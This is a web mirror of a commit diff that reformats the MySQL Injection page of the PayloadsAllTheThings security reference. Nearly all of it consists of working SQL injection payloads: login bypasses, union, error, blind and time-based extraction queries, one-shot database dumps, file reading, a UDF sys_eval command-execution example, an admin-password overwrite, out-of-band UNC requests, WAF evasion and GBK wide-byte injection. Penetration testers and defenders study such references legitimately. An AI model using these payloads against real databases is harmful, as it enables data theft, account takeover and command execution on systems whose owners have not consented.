gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-30 06:30:27 -08:00
Code Issues Packages Projects Releases Wiki Activity

Markdown Linting - SQL, Juggling, XSLT, XSS, Zip

Browse Source
This commit is contained in:
Swissky
2025-03-26 20:53:03 +01:00
parent bad860d79d
commit 2611dd1ba3
24 changed files with 445 additions and 646 deletions
Download Patch File Download Diff File Expand all files Collapse all files

150
SQL Injection/MySQL Injection.md
View File

@@ -2,7 +2,6 @@
> MySQL Injection is a type of security vulnerability that occurs when an attacker is able to manipulate the SQL queries made to a MySQL database by injecting malicious input. This vulnerability is often the result of improperly handling user input, allowing attackers to execute arbitrary SQL code that can compromise the database's integrity and security.
## Summary
* [MYSQL Default Databases](#mysql-default-databases)
@@ -33,9 +32,9 @@
* [MYSQL Current Queries](#mysql-current-queries)
* [MYSQL Read Content of a File](#mysql-read-content-of-a-file)
* [MYSQL Command Execution](#mysql-command-execution)
* [WEBSHELL - OUTFILE method](#shell---outfile-method)
* [WEBSHELL - DUMPFILE method](#shell---dumpfile-method)
* [COMMAND - UDF Library](#udf-library)
* [WEBSHELL - OUTFILE method](#webshell---outfile-method)
* [WEBSHELL - DUMPFILE method](#webshell---dumpfile-method)
* [COMMAND - UDF Library](#command---udf-library)
* [MYSQL INSERT](#mysql-insert)
* [MYSQL Truncation](#mysql-truncation)
* [MYSQL Out of Band](#mysql-out-of-band)
@@ -50,14 +49,12 @@
* [Wide Byte Injection (GBK)](#wide-byte-injection-gbk)
* [References](#references)
## MYSQL Default Databases
| Name | Description |
|--------------------|--------------------------|
| mysql | Requires root privileges |
| information_schema | Available from version 5 and higher |
## MYSQL Comments
@@ -73,32 +70,34 @@ MySQL comments are annotations in SQL code that are ignored by the MySQL server
| `;%00` | Nullbyte |
| \` | Backtick |
## MYSQL Testing Injection
* **Strings**: Query like `SELECT * FROM Table WHERE id = 'FUZZ';`
```
' False
'' True
" False
"" True
\ False
\\ True
```ps1
' False
'' True
" False
"" True
\ False
\\ True
```
* **Numeric**: Query like `SELECT * FROM Table WHERE id = FUZZ;`
```ps1
AND 1 True
AND 0 False
AND true True
AND false False
1-false Returns 1 if vulnerable
1-true Returns 0 if vulnerable
1*56 Returns 56 if vulnerable
1*56 Returns 1 if not vulnerable
AND 1 True
AND 0 False
AND true True
AND false False
1-false Returns 1 if vulnerable
1-true Returns 0 if vulnerable
1*56 Returns 56 if vulnerable
1*56 Returns 1 if not vulnerable
```
* **Login**: Query like `SELECT * FROM Users WHERE username = 'FUZZ1' AND password = 'FUZZ2';`
```ps1
' OR '1
' OR 1 -- -
@@ -109,14 +108,12 @@ MySQL comments are annotations in SQL code that are ignored by the MySQL server
'=0--+
```
## MYSQL Union Based
### Detect Columns Number
To successfully perform a union-based SQL injection, an attacker needs to know the number of columns in the original query.
#### Iterative NULL Method
Systematically increase the number of columns in the `UNION SELECT` statement until the payload executes without errors or produces a visible change. Each iteration checks the compatibility of the column count.
@@ -127,7 +124,6 @@ UNION SELECT NULL, NULL;--
UNION SELECT NULL, NULL, NULL;--
```
#### ORDER BY Method
Keep incrementing the number until you get a `False` response. Even though `GROUP BY` and `ORDER BY` have different functionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
@@ -148,20 +144,18 @@ Similar to the previous method, we can check the number of columns with one requ
ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ # Unknown column '4' in 'order clause'
```
#### LIMIT INTO Method
This method is effective when error reporting is enabled. It can help determine the number of columns in cases where the injection point occurs after a LIMIT clause.
This method is effective when error reporting is enabled. It can help determine the number of columns in cases where the injection point occurs after a LIMIT clause.
| Payload | Error |
| ---------------------------- | --------------- |
| `1' LIMIT 1,1 INTO @--+` | `The used SELECT statements have a different number of columns` |
| `1' LIMIT 1,1 INTO @,@--+ ` | `The used SELECT statements have a different number of columns` |
| `1' LIMIT 1,1 INTO @,@--+` | `The used SELECT statements have a different number of columns` |
| `1' LIMIT 1,1 INTO @,@,@--+` | `No error means query uses 3 columns` |
Since the result doesn't show any error it means the query uses 3 columns: `-1' UNION SELECT 1,2,3--+`.
### Extract Database With Information_Schema
This query retrieves the names of all schemas (databases) on the server.
@@ -188,7 +182,6 @@ This query aims to retrieve data from a specific table.
UNION SELECT 1,2,3,4,...,GROUP_CONCAT(0x7c,data,0x7C) FROM ...
```
### Extract Columns Name Without Information_Schema
Method for `MySQL >= 4.1`.
@@ -206,8 +199,7 @@ Method for `MySQL 5`
| `UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a` | Duplicate column name '**name**' |
| `UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))a` | Data |
### Extract Data Without Columns Name
### Extract Data Without Columns Name
Extracting data from the 4th column without knowing its name.
@@ -226,7 +218,6 @@ MariaDB [dummydb]> SELECT AUTHOR_ID,TITLE FROM POSTS WHERE AUTHOR_ID=-1 UNION SE
+-----------+-----------------------------------------------------------------+
```
## MYSQL Error Based
| Name | Payload |
@@ -240,7 +231,6 @@ MariaDB [dummydb]> SELECT AUTHOR_ID,TITLE FROM POSTS WHERE AUTHOR_ID=-1 UNION SE
| NAME_CONST | `AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--` |
| UUID_TO_BIN | `AND UUID_TO_BIN(version())='1` |
### MYSQL Error Based - Basic
Works with `MySQL >= 4.1`
@@ -250,7 +240,6 @@ Works with `MySQL >= 4.1`
'+(SELECT 1 AND ROW(1,1)>(SELECT COUNT(*),CONCAT(CONCAT(@@VERSION),0X3A,FLOOR(RAND()*2))X FROM (SELECT 1 UNION SELECT 2)A GROUP BY X LIMIT 1))+'
```
### MYSQL Error Based - UpdateXML Function
```sql
@@ -268,7 +257,6 @@ UPDATEXML(null,CONCAT(0x0a,version()),null)-- -
UPDATEXML(null,CONCAT(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
```
### MYSQL Error Based - Extractvalue Function
Works with `MySQL >= 5.1`
@@ -281,7 +269,6 @@ Works with `MySQL >= 5.1`
?id=1 AND EXTRACTVALUE(RAND(),CONCAT(0X3A,(SELECT CONCAT(CHAR(126),data_column,CHAR(126)) FROM data_schema.data_table LIMIT data_offset,1)))--
```
### MYSQL Error Based - NAME_CONST function (only for constants)
Works with `MySQL >= 5.0`
@@ -292,7 +279,6 @@ Works with `MySQL >= 5.0`
?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)--
```
## MYSQL Blind
### MYSQL Blind With Substring Equivalent
@@ -313,7 +299,6 @@ Examples of Blind SQL injection using `SUBSTRING` or another equivalent function
?id=1 AND ASCII(LOWER(SUBSTR(version(),1,1)))=51
```
### MYSQL Blind Using a Conditional Statement
* TRUE: `if @@version starts with a 5`:
@@ -332,7 +317,6 @@ Examples of Blind SQL injection using `SUBSTRING` or another equivalent function
HTTP/1.1 200 OK
```
### MYSQL Blind With MAKE_SET
```sql
@@ -342,7 +326,6 @@ AND MAKE_SET(VALUE_TO_EXTRACT<(SELECT(length(concat(login,password)))),1)
AND MAKE_SET(VALUE_TO_EXTRACT<ascii(substring(concat(login,password),POS,1)),1)
```
### MYSQL Blind With LIKE
In MySQL, the `LIKE` operator can be used to perform pattern matching in queries. The operator allows the use of wildcard characters to match unknown or partial string values. This is especially useful in a blind SQL injection context when an attacker does not know the length or specific content of the data stored in the database.
@@ -357,7 +340,6 @@ SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
SELECT * FROM products WHERE product_name LIKE '%user_input%'
```
### MySQL Blind with REGEXP
Blind SQL injection can also be performed using the MySQL `REGEXP` operator, which is used for matching a string against a regular expression. This technique is particularly useful when attackers want to perform more complex pattern matching than what the `LIKE` operator can offer.
@@ -368,12 +350,12 @@ Blind SQL injection can also be performed using the MySQL `REGEXP` operator, whi
| `' OR (SELECT username FROM users WHERE username REGEXP '[0-9]') --` | Checking for the presence of digits |
| `' OR (SELECT username FROM users WHERE username REGEXP '^a[a-z]') --` | Checking for data starting by "a" |
## MYSQL Time Based
The following SQL codes will delay the output from MySQL.
* MySQL 4/5 : [`BENCHMARK()`](https://dev.mysql.com/doc/refman/8.4/en/select-benchmarking.html)
```sql
+BENCHMARK(40000000,SHA1(1337))+
'+BENCHMARK(3200,SHA1(1))+'
@@ -381,6 +363,7 @@ The following SQL codes will delay the output from MySQL.
```
* MySQL 5: [`SLEEP()`](https://dev.mysql.com/doc/refman/8.4/en/miscellaneous-functions.html#function_sleep)
```sql
RLIKE SLEEP([SLEEPTIME])
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
@@ -428,7 +411,6 @@ Extracting column_name.
1 AND (SELECT SLEEP(10) FROM DUAL WHERE (SELECT table_name FROM information_schema.columns WHERE table_schema=DATABASE() AND column_name LIKE '%pass%' LIMIT 0,1) LIKE '%')#
```
### Using Conditional Statements
```sql
@@ -437,7 +419,6 @@ Extracting column_name.
?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
```
## MYSQL DIOS - Dump in One Shot
DIOS (Dump In One Shot) SQL Injection is an advanced technique that allows an attacker to extract entire database contents in a single, well-crafted SQL injection payload. This method leverages the ability to concatenate multiple pieces of data into a single result set, which is then returned in one response from the database.
@@ -448,41 +429,46 @@ DIOS (Dump In One Shot) SQL Injection is an advanced technique that allows an at
```
* SecurityIdiots
```sql
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
```
* Profexer
```sql
(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
```
* Dr.Z3r0
```sql
(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))
```
* M@dBl00d
```sql
(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
```
* Zen
```sql
+make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
```
* sharik
```sql
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)
```
## MYSQL Current Queries
`INFORMATION_SCHEMA.PROCESSLIST` is a special table available in MySQL and MariaDB that provides information about active processes and threads within the database server. This table can list all operations that DB is performing at the moment.
The `PROCESSLIST` table contains several important columns, each providing details about the current processes. Common columns include:
The `PROCESSLIST` table contains several important columns, each providing details about the current processes. Common columns include:
* **ID** : The process identifier.
* **USER** : The MySQL user who is running the process.
@@ -492,17 +478,16 @@ The `PROCESSLIST` table contains several important columns, each providing detai
* **TIME** : The time in seconds that the process has been running.
* **STATE** : The current state of the process.
* **INFO** : The text of the statement being executed, or NULL if no statement is being executed.
```sql
SELECT * FROM INFORMATION_SCHEMA.PROCESSLIST;
```
| ID | USER | HOST | DB | COMMAND | TIME | STATE | INFO |
| --- | --------- | ---------------- | ------- | ------- | ---- | ---------- | ---- |
| 1 | root | localhost | testdb | Query | 10 | executing | SELECT * FROM some_table |
| 2 | app_uset | 192.168.0.101 | appdb | Sleep | 300 | sleeping | NULL |
| 3 | gues_user | example.com:3360 | NULL | Connect | 0 | connecting | NULL |
| ID | USER | HOST | DB | COMMAND | TIME | STATE | INFO |
| --- | --------- | ---------------- | ------- | ------- | ---- | ---------- | ---- |
| 1 | root | localhost | testdb | Query | 10 | executing | SELECT * FROM some_table |
| 2 | app_uset | 192.168.0.101 | appdb | Sleep | 300 | sleeping | NULL |
| 3 | gues_user | example.com:3360 | NULL | Connect | 0 | connecting | NULL |
```sql
UNION SELECT 1,state,info,4 FROM INFORMATION_SCHEMA.PROCESSLIST #
@@ -514,7 +499,6 @@ Dump in one shot query to extract the whole content of the table.
UNION SELECT 1,(SELECT(@)FROM(SELECT(@:=0X00),(SELECT(@)FROM(information_schema.processlist)WHERE(@)IN(@:=CONCAT(@,0x3C62723E,state,0x3a,info))))a),3,4 #
```
## MYSQL Read Content of a File
Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement`
@@ -571,7 +555,6 @@ mysql> SELECT sys_eval('id');
+--------------------------------------------------+
```
## MYSQL INSERT
`ON DUPLICATE KEY UPDATE` keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
@@ -588,14 +571,13 @@ The query would look like this:
INSERT INTO users (email, password) VALUES ("attacker_dummy@example.com", "BCRYPT_HASH"), ("admin@example.com", "P@ssw0rd") ON DUPLICATE KEY UPDATE password="P@ssw0rd" -- ", "BCRYPT_HASH_OF_YOUR_PASSWORD_INPUT");
```
This query will insert a row for the user "attacker_dummy@example.com". It will also insert a row for the user "admin@example.com".
Because this row already exists, the `ON DUPLICATE KEY UPDATE` keyword tells MySQL to update the `password` column of the already existing row to "P@ssw0rd". After this, we can simply authenticate with "admin@example.com" and the password "P@ssw0rd".
This query will insert a row for the user "`attacker_dummy@example.com`". It will also insert a row for the user "`admin@example.com`".
Because this row already exists, the `ON DUPLICATE KEY UPDATE` keyword tells MySQL to update the `password` column of the already existing row to "P@ssw0rd". After this, we can simply authenticate with "`admin@example.com`" and the password "P@ssw0rd".
## MYSQL Truncation
In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
In MYSQL "`admin`" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
```sql
`username` varchar(20) not null
@@ -603,7 +585,6 @@ In MYSQL "`admin `" and "`admin`" are the same. If the username column in the da
Payload: `username = "admin a"`
## MYSQL Out of Band
```powershell
@@ -632,7 +613,6 @@ LOAD DATA INFILE '\\\\error\\abc' INTO TABLE DATABASE.TABLE_NAME;
:warning: Don't forget to escape the '\\\\'.
## MYSQL WAF Bypass
### Alternative to Information Schema
@@ -658,7 +638,6 @@ mysql> SHOW TABLES IN dvwa;
+----------------+
```
### Alternative to VERSION
```sql
@@ -691,7 +670,6 @@ mysql> SELECT @@GLOBAL.VERSION;
+------------------+
```
### Alternative to GROUP_CONCAT
Requirement: `MySQL >= 5.7.22`
@@ -705,7 +683,6 @@ Use `json_arrayagg()` instead of `group_concat()` which allows less symbols to b
SELECT json_arrayagg(concat_ws(0x3a,table_schema,table_name)) from INFORMATION_SCHEMA.TABLES;
```
### Scientific Notation
In MySQL, the e notation is used to represent numbers in scientific notation. It's a way to express very large or very small numbers in a concise format. The e notation consists of a number followed by the letter e and an exponent.
@@ -713,30 +690,28 @@ The format is: `base 'e' exponent`.
For example:
* `1e3` represents `1 x 10^3` which is `1000`.
* `1.5e3` represents `1.5 x 10^3` which is `1500`.
* `2e-3` represents `2 x 10^-3` which is `0.002`.
* `1e3` represents `1 x 10^3` which is `1000`.
* `1.5e3` represents `1.5 x 10^3` which is `1500`.
* `2e-3` represents `2 x 10^-3` which is `0.002`.
The following queries are equivalent:
* `SELECT table_name FROM information_schema 1.e.tables`
* `SELECT table_name FROM information_schema .tables`
In the same way, the common payload to bypass authentication `' or ''='` is equivalent to `' or 1.e('')='` and `1' or 1.e(1) or '1'='1`.
This technique can be used to obfuscate queries to bypass WAF, for example: `1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2`
* `SELECT table_name FROM information_schema 1.e.tables`
* `SELECT table_name FROM information_schema .tables`
In the same way, the common payload to bypass authentication `' or ''='` is equivalent to `' or 1.e('')='` and `1' or 1.e(1) or '1'='1`.
This technique can be used to obfuscate queries to bypass WAF, for example: `1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2`
### Conditional Comments
MySQL conditional comments are enclosed within `/*! ... */` and can include a version number to specify the minimum version of MySQL that should execute the contained code.
The code inside this comment will be executed only if the MySQL version is greater than or equal to the number immediately following the `/*!`. If the MySQL version is less than the specified number, the code inside the comment will be ignored.
The code inside this comment will be executed only if the MySQL version is greater than or equal to the number immediately following the `/*!`. If the MySQL version is less than the specified number, the code inside the comment will be ignored.
* `/*!12345UNION*/`: This means that the word UNION will be executed as part of the SQL statement if the MySQL version is 12.345 or higher.
* `/*!31337SELECT*/`: Similarly, the word SELECT will be executed if the MySQL version is 31.337 or higher.
**Examples**: `/*!12345UNION*/`, `/*!31337SELECT*/`
### Wide Byte Injection (GBK)
Wide byte injection is a specific type of SQL injection attack that targets applications using multi-byte character sets, like GBK or SJIS. The term "wide byte" refers to character encodings where one character can be represented by more than one byte. This type of injection is particularly relevant when the application and the database interpret multi-byte sequences differently.
@@ -779,23 +754,22 @@ Here's a breakdown of how the wide byte injection works:
For instance, if the input is `?id=1'`, PHP will add a backslash, resulting in the SQL query: `SELECT * FROM users WHERE id='1\'' LIMIT 0,1`.
However, when the sequence `%df` is introduced before the single quote, as in `?id=1%df'`, PHP still adds the backslash. This results in the SQL query: `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1`.
However, when the sequence `%df` is introduced before the single quote, as in `?id=1%df'`, PHP still adds the backslash. This results in the SQL query: `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1`.
In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape charactr, allowing for SQL injection.
Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the backslash, the SQL query transforms into: `SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1`. This altered query can be successfully injected, bypassing the intended SQL logic.
## References
- [[SQLi] Extracting data without knowing columns names - Ahmed Sultan - February 9, 2019](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
- [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection - Marc Olivier Bergeron - October 19, 2021](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)
- [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
- [Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
- [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://sqlwiki.netspi.com/injectionTypes/errorBased)
- [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
- [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
- [SQL injection - The oldschool way - 02 - Ahmed Sultan - January 1, 2025](https://www.youtube.com/watch?v=u91EdO1cDak)
- [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://resources.infosecinstitute.com/sql-truncation-attack/)
- [SQLi filter evasion cheat sheet (MySQL) - Johannes Dahse - December 4, 2010](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
- [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://websec.ca/kb/sql_injection#MySQL_Default_Databases)
* [[SQLi] Extracting data without knowing columns names - Ahmed Sultan - February 9, 2019](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
* [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection - Marc Olivier Bergeron - October 19, 2021](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)
* [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
* [Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
* [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://sqlwiki.netspi.com/injectionTypes/errorBased)
* [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
* [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
* [SQL injection - The oldschool way - 02 - Ahmed Sultan - January 1, 2025](https://www.youtube.com/watch?v=u91EdO1cDak)
* [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://resources.infosecinstitute.com/sql-truncation-attack/)
* [SQLi filter evasion cheat sheet (MySQL) - Johannes Dahse - December 4, 2010](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
* [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://websec.ca/kb/sql_injection#MySQL_Default_Databases)